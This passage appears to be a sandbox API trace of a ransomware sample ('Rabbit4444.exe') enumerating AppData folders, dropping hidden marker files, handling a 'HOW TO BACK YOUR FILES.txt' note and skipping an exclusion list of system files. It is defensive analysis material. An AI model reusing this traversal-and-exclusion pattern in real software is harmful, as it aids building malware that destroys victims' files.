(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.942] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.942] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.942] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.942] CloseHandle (hObject=0x2a0) returned 1 [0064.942] CloseHandle (hObject=0x2cc) returned 1 [0064.943] GetCurrentThreadId () returned 0xd98 [0064.943] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0064.943] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache" [0064.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0064.943] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0064.943] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache" [0064.943] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\" [0064.943] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0064.943] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.944] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.956] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.958] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.959] CloseHandle (hObject=0x2cc) returned 1 [0064.959] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache") returned 101 [0064.959] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.959] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a690dfe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12ca0e8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0083f25, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0064.959] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.959] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.959] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.959] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.959] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a690dfe, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12ca0e8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0083f25, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.959] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.959] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.959] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.959] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.960] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.960] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0083f25, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0083f25, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf00aa43b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.960] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.960] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.960] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0083f25, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0083f25, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf00aa43b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.960] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0064.960] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.960] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.960] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.961] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.961] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.961] CloseHandle (hObject=0x2a0) returned 1 [0064.961] CloseHandle (hObject=0x2cc) returned 1 [0064.961] GetCurrentThreadId () returned 0xd98 [0064.961] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0064.961] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData" [0064.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ad0 | out: hHeap=0xe0000) returned 1 [0064.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0064.961] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData" [0064.961] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\" [0064.961] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0064.961] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.965] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.968] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.985] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.986] CloseHandle (hObject=0x2cc) returned 1 [0064.986] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData") returned 98 [0064.986] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6b7054, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c98f9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf00aa43b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.987] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.987] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.987] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.987] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.987] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6b7054, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12c98f9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf00aa43b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.987] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.987] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.987] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.987] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.987] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.987] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf00aa43b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf00aa43b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf00d040d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.987] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.987] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.987] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf00aa43b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf00aa43b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf00d040d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.987] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0064.987] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.987] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.989] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.989] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.990] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.990] CloseHandle (hObject=0x2a0) returned 1 [0064.990] CloseHandle (hObject=0x2cc) returned 1 [0064.990] GetCurrentThreadId () returned 0xd98 [0064.990] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0064.990] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC" [0064.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0064.990] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0064.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC" [0064.990] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\" [0064.990] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0064.990] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.992] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.995] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.996] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.996] CloseHandle (hObject=0x2cc) returned 1 [0064.996] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC") returned 93 [0064.997] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.997] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x37a7aa93, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf00f6988, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0064.997] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.997] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.997] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.997] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.997] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x37a7aa93, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf00f6988, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.997] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.997] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.997] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.997] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.997] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.997] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf00f6988, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf00f6988, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf00f6988, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.997] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.997] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.997] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1282232, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a703502, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0064.997] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0064.998] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0064.998] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0064.998] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0064.998] lstrcpyW (in: lpString1=0x130ebf4, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0064.998] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0064.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0064.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108838 [0064.999] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x11cda8 [0064.999] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x8a703502, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd12829ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8a703502, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.999] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned 